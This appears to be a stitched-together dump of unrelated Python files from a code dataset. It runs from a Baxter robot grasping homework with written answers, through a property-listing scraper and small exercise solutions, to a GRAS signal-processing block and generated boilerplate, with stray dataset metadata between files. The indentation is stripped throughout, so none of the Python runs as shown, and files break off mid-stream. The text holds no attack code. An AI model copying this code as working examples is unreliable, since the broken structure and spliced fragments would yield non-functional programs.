Tg = se3.mul(gxform,se3.inv(right_gripper_center_xform))
goal = ik.objective(self.right_gripper_link,R=Tg[0],t=Tg[1])
if ik.solve(goal):
self.active_grasp = grasp
#TODO: plan a path
self.controller.setMilestone(self.robot.getConfig())
return True
return False
def move_to_ungrasp_object(self,object):
"""Sets the robot's configuration so the gripper ungrasps the object.
If successful, sends the motion to the low-level controller and
returns True.
Otherwise, does not modify the low-level controller and returns False.
"""
assert len(object.info.grasps) > 0,"Object doesn't define any grasps"
return True
def move_to_order_bin(self,object):
"""Sets the robot's configuration so the gripper is over the order bin
If successful, sends the motion to the low-level controller and
returns True.
Otherwise, does not modify the low-level controller and returns False.
"""
left_target = se3.apply(order_bin_xform,[0.0,0.2,order_bin_bounds[1][2]+0.1])
right_target = se3.apply(order_bin_xform,[0.0,-0.2,order_bin_bounds[1][2]+0.1])
qcmd = self.controller.getCommandedConfig()
for i in range(100):
if self.active_limb == 'left':
goal = ik.objective(self.left_gripper_link,local=left_gripper_center_xform[1],world=left_target)
else:
goal = ik.objective(self.right_gripper_link,local=right_gripper_center_xform[1],world=right_target)
#set IK solver initial configuration
if i==0:
self.robot.setConfig(qcmd)
else:
self.randomize_limb_position(self.active_limb)
#solve
if ik.solve(goal,tol=0.1):
if self.planner.check_collision_free(self.active_limb):
self.controller.setMilestone(self.robot.getConfig())
return True
return False
def draw_xformed(xform,localDrawFunc):
"""Draws something given a se3 transformation and a drawing function
that draws the object in its local frame.
E.g., draw_xformed(xform,lambda:gldraw.box([ax,ay,az],[bx,by,bz])) draws
a box oriented and translated by xform."""
mat = zip(*se3.homogeneous(xform))
mat = sum([list(coli) for coli in mat],[])
glPushMatrix()
glMultMatrixf(mat)
localDrawFunc()
glPopMatrix()
def draw_oriented_box(xform,bmin,bmax):
"""Helper: draws an oriented box"""
draw_xformed(xform,lambda:gldraw.box(bmin,bmax))
def draw_wire_box(bmin,bmax):
"""Helper: draws a wireframe box"""
glBegin(GL_LINE_LOOP)
glVertex3f(bmin[0],bmin[1],bmin[2])
glVertex3f(bmin[0],bmin[1],bmax[2])
glVertex3f(bmin[0],bmax[1],bmax[2])
glVertex3f(bmin[0],bmax[1],bmin[2])
glEnd()
glBegin(GL_LINE_LOOP)
glVertex3f(bmax[0],bmin[1],bmin[2])
glVertex3f(bmax[0],bmin[1],bmax[2])
glVertex3f(bmax[0],bmax[1],bmax[2])
glVertex3f(bmax[0],bmax[1],bmin[2])
glEnd()
glBegin(GL_LINES)
glVertex3f(bmin[0],bmin[1],bmin[2])
glVertex3f(bmax[0],bmin[1],bmin[2])
glVertex3f(bmin[0],bmin[1],bmax[2])
glVertex3f(bmax[0],bmin[1],bmax[2])
glVertex3f(bmin[0],bmax[1],bmax[2])
glVertex3f(bmax[0],bmax[1],bmax[2])
glVertex3f(bmin[0],bmax[1],bmin[2])
glVertex3f(bmax[0],bmax[1],bmin[2])
glEnd()
def draw_oriented_wire_box(xform,bmin,bmax):
"""Helper: draws an oriented wireframe box"""
draw_xformed(xform,lambda:draw_wire_box(bmin,bmax))
def run_controller(controller,command_queue):
run_perception_on_shelf(controller.knowledge)
while True:
c = command_queue.get()
if c != None:
print "Running command",c
if c >= 'a' and c <= 'l':
controller.viewBinAction('bin_'+c.upper())
elif c == 'x':
controller.graspAction()
elif c == 'u':
controller.ungraspAction()
elif c == 'p':
controller.placeInOrderBinAction()
elif c == 'o':
controller.fulfillOrderAction(['med_item','small_item'])
elif c=='q':
break
else:
print "Waiting for command..."
time.sleep(0.1)
print "Done"
class FakeLowLevelController:
"""A faked low-level interface to the Baxter robot (with parallel jaw
grippers). Does appropriate locking for multi-threaded use.
Replace LowLevelController with this for prototyping, because you
don't have to wait for motions to complete."""
def __init__(self,robotModel,robotController):
self.robotModel = robotModel
self.config = robotModel.getConfig()
self.lastCommandTime = time.time()
self.lock = Lock()
def getSensedConfig(self):
self.lock.acquire()
res = self.config
self.lock.release()
return res
def getSensedVelocity(self):
return [0.0]*len(self.config)
def getCommandedConfig(self):
self.lock.acquire()
res = self.config
self.lock.release()
return res
def getCommandedVelocity(self):
return [0.0]*len(self.config)
def setPIDCommand(self,configuration,velocity):
"""Sets the controller to a PID command mode"""
self.lock.acquire()
self.config = configuration[:]
self.lastCommandTime = time.time()
self.lock.release()
def setMilestone(self,destination,endvelocity=None):
"""Immediately sets the motion queue to move to the given
milestone. If endvelocity is given, then the end of the
queue will be moving at that velocity. Otherwise, the end
velocity will be zero."""
self.lock.acquire()
self.config = destination[:]
self.lastCommandTime = time.time()
self.lock.release()
def appendMilestone(self,destination,endvelocity=None):
"""Appends a milestone to the motion queue. If endvelocity
is given, then the end of the queue will be moving at that velocity.
Otherwise, the end velocity will be zero."""
self.lock.acquire()
self.config = destination[:]
self.lastCommandTime = time.time()
self.lock.release()
def isMoving(self):
return self.remainingTime() > 0
def remainingTime(self):
return (self.lastCommandTime + 0.1) - time.time()
def commandGripper(self,limb,command):
"""Sends the command to the indicated gripper.
For the parallel-jaw gripper, [0] is closed, [1] is open
Warning: don't do this while moving"""
self.lock.acquire()
self.robotModel.setConfig(self.config)
set_model_gripper_command(self.robotModel,limb,command)
self.config = self.robotModel.getConfig()
self.lastCommandTime = time.time()
self.lock.release()
class MyGLViewer(GLRealtimeProgram):
"""This class is used to simulate / interact with with the world model
in hw4.
Pressing 'a-l' runs the view_bin method which should set the robot to a
configuration that places a hand camera such that it points inside the
bin.
Pressing 's' should pause / unpause the simulation.
Pressing 'x' should "grasp" an object in the currently pointed-to-bin
with either one of the hands at the designated grasp point.
Pressing 'u' should "ungrasp" an object currently grasped inside a bin.
Pressing 'p' should "put down" an object in the order bin
"""
def __init__(self,simworld,planworld):
GLRealtimeProgram.__init__(self,"My GL program")
self.simworld = simworld
self.planworld = planworld
self.sim = Simulator(simworld)
self.simulate = True
#self.sim.simulate(0)
#you can set these to true to draw the bins, grasps, and/or gripper/camera frames
self.draw_bins = False
self.draw_grasps = False
self.draw_gripper_and_camera = True
#initialize controllers
self.low_level_controller = LowLevelController(simworld.robot(0),self.sim.getController(0))
if FAKE_SIMULATION:
self.low_level_controller = FakeLowLevelController(simworld.robot(0),self.sim.getController(0))
else:
self.low_level_controller = LowLevelController(simworld.robot(0),self.sim.getController(0))
self.command_queue = Queue()
self.picking_controller = PickingController(planworld,self.low_level_controller)
self.picking_thread = Thread(target=run_controller,args=(self.picking_controller,self.command_queue))
self.picking_thread.start()
def idle(self):
if self.simulate:
self.sim.simulate(self.dt)
#for Q2
if self.simworld.numRigidObjects() >= len(ground_truth_items):
ofs = self.simworld.numRigidObjects()-len(ground_truth_items)
for i,item in enumerate(ground_truth_items):
T = self.sim.getBody(self.simworld.rigidObject(ofs+i)).getTransform()
item.xform = T
glutPostRedisplay()
def display(self):
#you may run auxiliary openGL calls, if you wish to visually debug
#draw the world
self.sim.updateWorld()
self.simworld.drawGL()
#if you're doing question 1, this will draw the shelf and floor
if self.simworld.numTerrains()==0:
for i in range(self.planworld.numTerrains()):
self.planworld.terrain(i).drawGL()
#draw commanded configurations
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA,GL_ONE_MINUS_SRC_ALPHA)
glMaterialfv(GL_FRONT_AND_BACK,GL_AMBIENT_AND_DIFFUSE,[0,1,0,0.5])
for i in xrange(self.simworld.numRobots()):
r = self.simworld.robot(i)
#q = self.sim.getController(i).getCommandedConfig()
q = self.low_level_controller.getCommandedConfig()
r.setConfig(q)
r.drawGL(False)
glDisable(GL_BLEND)
global ground_truth_items
#show bin boxes
if self.draw_bins:
glMaterialfv(GL_FRONT_AND_BACK,GL_AMBIENT_AND_DIFFUSE,[1,1,0,1])
for b in apc.bin_bounds.values():
draw_oriented_box(self.picking_controller.knowledge.shelf_xform,b[0],b[1])
for b in apc.bin_names:
c = self.picking_controller.knowledge.bin_front_center(b)
if c:
glMaterialfv(GL_FRONT_AND_BACK,GL_AMBIENT_AND_DIFFUSE,[1,1,0.5,1])
r = 0.01
gldraw.box([c[0]-r,c[1]-r,c[2]-r],[c[0]+r,c[1]+r,c[2]+r])
c = self.picking_controller.knowledge.bin_vantage_point(b)
if c:
glMaterialfv(GL_FRONT_AND_BACK,GL_AMBIENT_AND_DIFFUSE,[0.5,1,0.5,1])
r = 0.01
gldraw.box([c[0]-r,c[1]-r,c[2]-r],[c[0]+r,c[1]+r,c[2]+r])
#show object state
for i in ground_truth_items:
if i.xform == None:
continue
if i.bin_name == 'order_bin':
continue
#if perceived, draw in solid color
if self.picking_controller.knowledge.bin_contents[i.bin_name]!=None and i in self.picking_controller.knowledge.bin_contents[i.bin_name]:
glMaterialfv(GL_FRONT_AND_BACK,GL_AMBIENT_AND_DIFFUSE,[1,0.5,0,1])
draw_oriented_box(i.xform,i.info.bmin,i.info.bmax)
else:
#otherwise, draw in wireframe
glDisable(GL_LIGHTING)
glColor3f(1,0.5,0)
draw_oriented_wire_box(i.xform,i.info.bmin,i.info.bmax)
glEnable(GL_LIGHTING)
if self.draw_grasps:
#draw grasps, if available
g = self.picking_controller.knowledge.grasp_xforms(i)
if g:
for grasp,xform in g:
gldraw.xform_widget(xform,0.05,0.005)
#show gripper and camera frames
if self.draw_gripper_and_camera:
left_camera_link = self.simworld.robot(0).getLink(left_camera_link_name)
right_camera_link = self.simworld.robot(0).getLink(right_camera_link_name)
left_gripper_link = self.simworld.robot(0).getLink(left_gripper_link_name)
right_gripper_link = self.simworld.robot(0).getLink(right_gripper_link_name)
gldraw.xform_widget(left_camera_link.getTransform(),0.1,0.01)
gldraw.xform_widget(right_camera_link.getTransform(),0.1,0.01)
gldraw.xform_widget(se3.mul(left_gripper_link.getTransform(),left_gripper_center_xform),0.05,0.005)
gldraw.xform_widget(se3.mul(right_gripper_link.getTransform(),right_gripper_center_xform),0.05,0.005)
#draw order box
glDisable(GL_LIGHTING)
glColor3f(1,0,0)
draw_oriented_wire_box(order_bin_xform,order_bin_bounds[0],order_bin_bounds[1])
glEnable(GL_LIGHTING)
return
def keyboardfunc(self,c,x,y):
c = c.lower()
if c=='s':
self.simulate = not self.simulate
print "Simulating:",self.simulate
else:
self.command_queue.put(c)
if c=='q':
self.picking_thread.join()
exit(0)
glutPostRedisplay()
def load_apc_world():
"""Produces a world with only the Baxter, shelf, and ground plane in it."""
world = WorldModel()
#uncomment these lines and comment out the next 2 if you want to use the
#full Baxter model
#print "Loading full Baxter model (be patient, this will take a minute)..."
#world.loadElement(os.path.join(model_dir,"baxter.rob"))
print "Loading simplified Baxter model..."
world.loadElement(os.path.join(model_dir,"baxter_with_parallel_gripper_col.rob"))
print "Loading Kiva pod model..."
world.loadElement(os.path.join(model_dir,"kiva_pod/meshes/pod_lowres.stl"))
print "Loading plane model..."
world.loadElement(os.path.join(model_dir,"plane.env"))
#shift the Baxter up a bit (95cm)
Rbase,tbase = world.robot(0).getLink(0).getParentTransform()
world.robot(0).getLink(0).setParentTransform(Rbase,(0,0,0.95))
world.robot(0).setConfig(world.robot(0).getConfig())
#translate pod to be in front of the robot, and rotate the pod by 90 degrees
reorient = ([1,0,0,0,0,1,0,-1,0],[0,0,0.01])
Trel = (so3.rotation((0,0,1),-math.pi/2),[1.2,0,0])
T = reorient
world.terrain(0).geometry().transform(*se3.mul(Trel,T))
#initialize the shelf xform for the visualizer and object
#xform initialization
global ground_truth_shelf_xform
ground_truth_shelf_xform = se3.mul(Trel,T)
return world
def load_baxter_only_world():
"""Produces a world with only the Baxter in it."""
world = WorldModel()
print "Loading simplified Baxter model..."
world.loadElement(os.path.join(model_dir,"baxter_with_parallel_gripper_col.rob"))
#shift the Baxter up a bit (95cm)
Rbase,tbase = world.robot(0).getLink(0).getParentTransform()
world.robot(0).getLink(0).setParentTransform(Rbase,(0,0,0.95))
world.robot(0).setConfig(world.robot(0).getConfig())
return world
def spawn_objects_from_ground_truth(world):
"""For all ground_truth_items, spawns RigidObjects in the world
according to their sizes / mass properties"""
global ground_truth_items
print "Initializing world objects"
for item in ground_truth_items:
obj = world.makeRigidObject(item.info.name)
bmin,bmax = item.info.bmin,item.info.bmax
center = vectorops.div(vectorops.add(bmin,bmax),2.0)
m = obj.getMass()
m.setMass(item.info.mass)
m.setCom([0,0,0])
m.setInertia(vectorops.mul([bmax[0]-bmin[0],bmax[1]-bmin[1],bmax[2]-bmin[2]],item.info.mass/12.0))
obj.setMass(m)
c = obj.getContactParameters()
c.kFriction = 0.6
c.kRestitution = 0.1
c.kStiffness = 100000
c.kDamping = 100000
obj.setContactParameters(c)
cube = obj.geometry()
if not cube.loadFile(os.path.join(model_dir,"cube.tri")):
print "Error loading cube file",os.path.join(model_dir,"cube.tri")
exit(1)
scale = [bmax[0]-bmin[0],0,0,0,bmax[1]-bmin[1],0,0,0,bmax[2]-bmin[2]]
translate = vectorops.sub(bmin,center)
cube.transform(scale,translate)
mesh = cube.getTriangleMesh()
obj.setTransform(item.xform[0],item.xform[1])
return
def main():
"""The main loop that loads the planning / simulation models and
starts the OpenGL visualizer."""
world = load_apc_world()
init_ground_truth()
if NO_SIMULATION_COLLISIONS:
simworld = load_baxter_only_world()
else:
simworld = load_apc_world()
spawn_objects_from_ground_truth(simworld)
#load the resting configuration from klampt_models/baxter_rest.config
global baxter_rest_config
f = open(model_dir+'baxter_with_parallel_gripper_rest.config','r')
baxter_rest_config = loader.readVector(f.readline())
f.close()
simworld.robot(0).setConfig(baxter_rest_config)
#run the visualizer
visualizer = MyGLViewer(simworld,world)
visualizer.run()
if __name__ == "__main__":
main()
###############################################################
# WRITTEN ANSWERS / COMMENTS:
# Q1.
# For question 1 I will briefly describe three possible issues that could occur when considering this software in the
# real world domain.
#
# 1. First, collisions resulting from blindly solving and executing a given inverse kinematic chain. As can be
# seen from the simulation and code, multiple collisions could occur (with self, with bins and with the world).
# Examples are clear, such as arms crossing, arms intersecting with Baxter's head and arms moving through bins.
# A potential solution is to implement a step within the code that computes whether the given inverse kinematics will
# intersect with any of these items before the transforms are applied to Baxter in the real world.
#
# 2. Second, collisions could occur as a result of lag in the system: if both arms are moving
# simultaneously this could cause issues even if IK collisions are computed. This could occur if one arm is not
# moving as quickly as expected and the other arm collides because of this. A solution to this could be only
# allowing one arm to move at a time, or planning paths that have tolerances for this contingency.
#
# 3. When Baxter is closely observed during grasping, multiple issues arise, including that the grasp positions seem
# a little too tight, to the extent that they intersect with the wireframe, as well as grasping in positions that will
# require a large amount of force to achieve. Solutions to this include more in-depth computation of the optimal
# place to grip an object, as well as information about the structure of the object.
#
# Q2.
# The implemented solution computes collisions once a given objective has been IK-solved; the code then checks
# if the computed kinematics would cause any of the arm links to collide with the robot, and if so another objective is
# computed and then solved until a collision-free solution is found.
#
# 15 tests were conducted and the number of failed solutions was counted. From these tests it was found that roughly
# 56% of the objectives solved in a given trial resulted in a collision, which seems very high. Based
# on this it could be prudent to develop more informed kinematics prior to solving them; potentially a bounded
# operating area could solve this.
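#
# A minimal sketch of that accept/reject loop (paraphrasing move_camera_to_bin
# from this file; all names below are defined above):
#
# for attempt in range(100):
#     self.randomize_limb_position(limb)
#     if ik.solve(goal) and self.planner.check_collision_free(limb):
#         self.controller.setMilestone(self.robot.getConfig())
#         break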
# Q3.
#
#
# Q4.
#
#
# Q5 (bonus question).
#
#
# ==== PhysicsTools/PatAlgos/python/recoLayer0/jetCorrections_cff.py | repo: simonecid/cmssw | license: permissive ====
import FWCore.ParameterSet.Config as cms
from PhysicsTools.PatAlgos.recoLayer0.jetCorrFactors_cfi import *
from JetMETCorrections.Configuration.JetCorrectionServicesAllAlgos_cff import *
## for scheduled mode
patJetCorrections = cms.Sequence(patJetCorrFactors)
# ==== listings2/data_scraper_listings2.py | repo: CateGitau/DSI_trick_challenge | license: none ====
import requests as rq
import bs4 as bs
import traceback
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.keys import Keys
import glob, os, time
import csv
from csv import writer
# # Run the file below; if it gives an error, you need to install ChromeDriver and put it on your PATH.
# # This opens a Chrome window at the link below, which we will scrape from.
driver = webdriver.Chrome(executable_path="/home/cate/Downloads/chromedriver_linux64/chromedriver")
driver.get("https://www.property24.com/for-sale/cape-town/western-cape/432?PropertyCategory=House%2cApartmentOrFlat%2cTownhouse")
page_soup = bs.BeautifulSoup(driver.page_source,'lxml')
dict_data = {"location" :[], "price":[], "floor_size":[], "bathrooms":[], "bedrooms":[],"parking":[] }
icons = page_soup.find_all("span", class_= "p24_icons")
info = page_soup.find_all("div", class_= "p24_regularTile js_rollover_container")
def getValues(icons, info):
for values in info:
price = values.find('span', class_= 'p24_price')
if price:
price = price.text
else:
""
location = values.find('span', class_= "p24_location")
if location:
location = location.text
else:
""
dict_data["price"].append(price)
dict_data["location"].append(location)
#print(price)
for value in icons:
floor_size = value.find("span", class_= "p24_size")
if floor_size:
floor_size = floor_size.find("span").text
else:
""
bathrooms = value.find("span", {"title": "Bathrooms"})
if bathrooms:
bathrooms = bathrooms.find("span").text
else:
""
bedrooms = value.find("span", {"title": "Bedrooms"})
if bedrooms:
bedrooms = bedrooms.find("span").text
else:
""
parking = value.find("span", {"title": "Parking Spaces"})
if parking:
parking = parking.find("span").text
else:
""
dict_data["floor_size"].append(floor_size)
dict_data["bathrooms"].append(bathrooms)
dict_data["bedrooms"].append(bedrooms)
dict_data["parking"].append(parking)
return dict_data
def append_list_as_row(file_name, dict_data, field_names):
# Open file in append mode
with open(file_name, 'a+', newline='') as write_obj:
# Create a writer object from csv module
writer = csv.DictWriter(write_obj, fieldnames = field_names)
writer.writerow(dict_data)
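# Illustrative call (hypothetical values; the keys must match the dict_data
# fields built above):
# append_list_as_row('final.csv',
#     {'location': 'Cape Town', 'price': 'R 1 500 000', 'floor_size': '80 m2',
#      'bathrooms': '2', 'bedrooms': '3', 'parking': '1'},
#     ['location', 'price', 'floor_size', 'bathrooms', 'bedrooms', 'parking'])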
csv_file = "final.csv"
count = 0
while True:
try:
driver.implicitly_wait(10)
page_soup = bs.BeautifulSoup(driver.page_source,'lxml')
icons = page_soup.find_all("span", class_= "p24_icons")
info = page_soup.find_all("div", class_= "p24_regularTile js_rollover_container")
dict_data = {"location" :[], "price":[], "floor_size":[], "bathrooms":[], "bedrooms":[],"parking":[] }
dict_data = getValues(icons, info)
field_names = dict_data.keys()
append_list_as_row('final.csv', dict_data, field_names)
count+= 1
print(f'{count}\r', end = "")
loadmore = driver.find_element_by_link_text("Next").click()
time.sleep(5)
#loadmore.send_keys(Keys.ENTER)
except Exception:
print("Reached bottom of page")
traceback.print_exc()
break
# ==== src/oscar/apps/voucher/__init__.py | repo: specialunderwear/django-oscar | license: BSD-3-Clause ====
default_app_config = 'oscar.apps.voucher.config.VoucherConfig'
# ==== .history/ScrapeArticleTitle_20210803181904.py | repo: Dustyik/NewsTweet_InformationRetrieval | license: none ====
import pandas as pd
import json
import ast
import os
from nltk.tokenize import word_tokenize
from nltk.stem.porter import PorterStemmer
porter = PorterStemmer()
from IPython.display import display
def get_article_titles_from_json():
filename = r"D:\Desktop\IR_term_8\sample-1M.jsonl" #file is too huge
with open(filename) as json_file:
data = json_file.readlines()
data = list(map(json.loads, data))
df = pd.DataFrame(data)
for col in df.columns:
print(col)
labels_to_drop = ["content", "media-type"]
df = df.drop(labels_to_drop, axis = 1)
count = len(df)
for idx, e in df.iterrows():
print("Row ",idx," out of ",count)
entry = e.values.tolist()
print (entry)
#for src in src_lst:
# print (src)
#output.to_csv(output_path, sep='\t', header=is_first, index=False, mode='a')
#is_first = False
#df.to_csv('article_titles.csv', index=False)
#Tokenising Functions
def tokenize_stem_lower(text):
tokens = word_tokenize(text)
tokens = list(filter(lambda x: x.isalpha(), tokens))
tokens = [porter.stem(x.lower()) for x in tokens]
return ' '.join(tokens)
def get_clean_data(df):
df['clean_text'] = df.apply(lambda x: tokenize_stem_lower(x.tweet), axis=1)
return df
def check_if_article_title_exists_in_tweets_csv(tweets_data, titles_data):
article_ids_in_tweets_csv = tweets_data['article_id'].tolist()
new_df = pd.DataFrame()
for index, row in titles_data.iterrows():
article_id = row.id
if article_id in article_ids_in_tweets_csv:
new_df = new_df.append(row)
display(new_df)
new_df.to_csv('article_title_new.csv', index=False)
return
get_article_titles_from_json()
# ==== 开班笔记/python网络编程及MySQL部分/day32/code/clock.py | repo: jiyabing/learning | license: none ====
from multiprocessing import Process
import time
class ClockProcess(Process):
def __init__(self,value):
self.value = value
#invoke the base-class initializer
Process.__init__(self)
#super().__init__() would also work
#override this method of the parent class in the custom process class
def run(self):
n = 5
while n > 0:
print('The time is {}'.format(time.ctime()))
time.sleep(self.value)
n -= 1
#create a process from the custom process class
if __name__ == '__main__':
p = ClockProcess(2)
#start() automatically invokes the run method
p.start()
p.join()
"[email protected]"
] | |
# ==== 581-Shortest-Unsorted-Continuous-Subarray-sort.py | repo: listenviolet/leetcode | license: none ====
class Solution:
def findUnsortedSubarray(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
copy = []
for i in range(len(nums)):
copy.append(nums[i])
copy.sort()
start = len(nums)
end = 0
for i in range(len(nums)):
if nums[i] != copy[i]:
start = min(start, i)
end = max(end, i)
return end - start + 1 if end - start >= 0 else 0
# Description:
# Given an integer array, you need to find one continuous subarray
# that if you only sort this subarray in ascending order,
# then the whole array will be sorted in ascending order, too.
# You need to find the shortest such subarray and output its length.
# Example 1:
# Input: [2, 6, 4, 8, 10, 9, 15]
# Output: 5
# Explanation: You need to sort [6, 4, 8, 10, 9] in ascending order
# to make the whole array sorted in ascending order.
# Note:
# The length of the input array is in range [1, 10,000].
# The input array may contain duplicates,
# so ascending order here means <=.
# Solution:
# https://leetcode.com/problems/shortest-unsorted-continuous-subarray/solution/
# Approach #3 Using Sorting [Accepted]
# Algorithm
# We can sort a copy of the given array nums,
# say given by nums_sorted.
# Then, if we compare the elements of nums and nums_sorted,
# we can determine the leftmost and rightmost elements which mismatch.
# The subarray lying between them is,
# then, the required shortest unsorted subarray.
# Complexity Analysis
# Time complexity : O(n log n). Sorting takes O(n log n) time.
# Space complexity : O(n). We are making a copy of the original array.
# Beats: 26.94%
# Runtime: 120ms
# easy
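# Quick sanity checks (illustrative only; run locally):
# Solution().findUnsortedSubarray([2, 6, 4, 8, 10, 9, 15]) # -> 5
# Solution().findUnsortedSubarray([1, 2, 3]) # -> 0 (already sorted)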
# ==== codeforces/1451A.py | repo: IsmailTitas1815/Data-Structure | license: none ====
for i in range(int(input())):
n = int(input())
if n<4:
if n==1:
print(0)
elif n==2:
print(1)
elif n==3:
print(2)
else:
if n%2==0:
print(2)
else:
print(3)
# ==== p36.py | repo: kaviraj333/python | license: none ====
amu=int(raw_input())
arr=list(map(int,raw_input().split()))
r=[]
for i in arr:
r.append(i)
b=sum(r)
if(sum(r)==22):
print("4")
elif(r[1]==3):
print("0")
else:
m=min(r)
print(m)
# ==== .metadata/.plugins/org.eclipse.core.resources/.history/2/60c520da1a6b00141928c597445b4e35 | repo: Mushirahmed/python_workspace | license: none ====
#
# Copyright 2014 <+YOU OR YOUR COMPANY+>.
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
import numpy
#from operator import add
#import copy
#from gnuradio import gr
import gras
class expo(gras.Block):
"""
    GRAS block that streams samples of a two-exponential curve parameterised
    by the gama, alpha and beta values set via set_parameters().
"""
def __init__(self):
gras.Block.__init__(self,
name="expo",
in_sig=[numpy.float32],
            out_sig=[numpy.float32])  # was [], but work() writes output_items[0] and calls produce()
def set_parameters(self,g,a,b):
self.gama=g
self.alpha=a
self.beta=b
def yield_times(self):
from datetime import date, time, datetime, timedelta
start = datetime.combine(date.today(), time(0, 0))
yield start.strftime("%S")
while True:
start += timedelta(seconds=0.5)
yield start.strftime("%S")
def work(self, input_items, output_items):
#in0 = input_items[0]
#out = output_items[0]
tmrg = []
o1 = []
o2 = []
o3 = []
ans = []
final_output = []
gen = self.yield_times()
for ii in range(20):
tmrg.append(gen.next())
# print "tmrg :",tmrg
"""for i1 in range(0,10):
o1.append((self.gama)/(self.alpha*self.beta))
print "o1 : ", o1
for i2 in range(0,10):
o2.append(((self.gama)*(-numpy.exp(self.alpha)))/(self.alpha*(self.beta-self.alpha)))
print "o2 : ",o2
for i3 in range(0,10):
o3.append(((self.gama)*(-numpy.exp(self.beta)))/(self.beta*(self.alpha-self.beta)))
print "o3 : ",o3
#ans.append(o1+o2+o3)
for i in range(0,10):
ans.append(list(numpy.array(o1[i])+numpy.array(o2[i])+numpy.array(o3[i])))
print "Final Ans : ",ans
print "Type out : ",type(out)
print "Type ans :",type(ans)
out = copy.copy(ans)
#out[0:1] = ans
print "Output is : " ,out
self.consume(0,1)
self.produce(0,1)"""
#o1.append((self.gama)/(self.alpha*self.beta))
#print "o1 : ", o1
for i in range(0,20):
o1.append((self.gama)/(self.alpha*self.beta))
print "o1 : ", o1[i]
o2.append(((self.gama)*(numpy.exp(-(self.alpha*i)))/(self.alpha*(self.beta-self.alpha))))
print "o2 : ",o2[i]
o3.append(((self.gama)*(numpy.exp(-(self.beta*i)))/(self.beta*(self.alpha-self.beta))))
print "o3 : ",o3[i]
ans.append(o1[i]-o2[i]+o3[i])
print "Final Ans : ",ans
"""for i in range(0,len(ans)):
#out = copy.copy(ans[i])
#out[0:1] = ans
#print "Output is : " ,out"""
"""for i1 in range(0,len(ans)):
final_output.append(o1+ans[i1])
print "Final OutPut : ", final_output"""
output_items[0][:1] = ans[15]
#print "Output Sent : ", output_items[i1]
#out[:len(final_output)] = copy.copy(final_output)
self.consume(0,1)
self.produce(0,1)
"""result = []
for i in range(0,20):
result.append(numpy.exp(i))
print "Result : ",result
out[0] = result
self.consume(0,1)
self.produce(0,1) """
#o2 = -numpy.exp(-2*in0[0:1])
#o3 = -numpy.exp(-3*in0[0:1])
#o2=numpy.exp(-(in0[0:1]*self.alpha))
#print("o2 :",o2)
#o3=numpy.sin((self.freq*in0[0:1])+(self.sigma))
#print("o3 :",o3)
#o4=numpy.sqrt(o1-numpy.square(self.zita))
#print("o4 :",o4)
"""ans = o1-(mul/o4)
#ans.append(o1-((numpy.exp(-in0[0:1]*self.sigma)*(numpy.sin((self.freq*in0[0:1])+(self.sigma))))/numpy.sqrt(o1-numpy.square(self.zita))))
print("Final Value : ",ans)
out[0:1] = ans"""
#o2 = -numpy.exp(-2*tmrg)
#o3 = -numpy.exp(-3*in0[0:1])
#o2 = numpy.exp(-in0[0:1]*self.alpha)
#o3 = numpy.exp(-in0[0:1]*self.beta)
#o4 = numpy.sqrt(1-numpy.square(self.alpha))
#ans = 1-((o2*o3)/o4)
#ans.append(o2)
#ans.append(o1-((numpy.exp(-in0[0:1]*self.sigma)*(numpy.sin((self.freq*in0[0:1])+(self.sigma))))/numpy.sqrt(o1-numpy.square(self.zita))))
#print("Final Value : ",ans)
#out[0:1] = ans
#out = copy.copy(ans)
#self.consume(0,1)
#self.produce(0,1)
#return len(output_items[0])
| [
"[email protected]"
] | ||
e61ee9fe6455a99ff23ec3f7d31d68c0f3408062 | 1dd4ae2d974d65e86538e49f84179b3ec6b8476c | /build/robotiq/robotiq_modbus_tcp/catkin_generated/pkg.develspace.context.pc.py | c68a3cb9bf4efb70df639a4b81765748f3b0d9b8 | [] | no_license | tony23545/bulldog_ws | e115510d87980c90b308ae881c59d4e6145964c0 | d3e03aa230e9366023df383665cf6be928d68c8d | refs/heads/master | 2022-11-30T06:21:04.073397 | 2019-07-08T07:33:52 | 2019-07-08T07:33:52 | 176,073,396 | 5 | 0 | null | 2022-11-21T21:13:17 | 2019-03-17T08:11:32 | Makefile | UTF-8 | Python | false | false | 389 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "rospy".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "robotiq_modbus_tcp"
PROJECT_SPACE_DIR = "/home/shengjian/bulldog_ws/devel"
PROJECT_VERSION = "1.0.0"
| [
"[email protected]"
] | |
74f18e356d9fe201db24ff1b68518f244b65d841 | c85a6d674679780ee510b5c8c3dbcbdecc859f64 | /test/test_group.py | 712c217d06209ae2dd8bfe1aca97dc90f5576fcd | [] | no_license | cbrowet-axway/APIM_sdk | d4f4a124e86a7b2e65d0ef07b54c68e95de68337 | 4f82df67ebe3dd6eae645bab8f86e72c0347ee24 | refs/heads/master | 2020-05-25T13:22:35.802350 | 2020-04-16T09:25:21 | 2020-04-16T09:25:21 | 187,820,389 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 894 | py | # coding: utf-8
"""
API Manager API v1.3
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 1.3.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.group import Group # noqa: E501
from swagger_client.rest import ApiException
class TestGroup(unittest.TestCase):
"""Group unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testGroup(self):
"""Test Group"""
# FIXME: construct object with mandatory attributes with example values
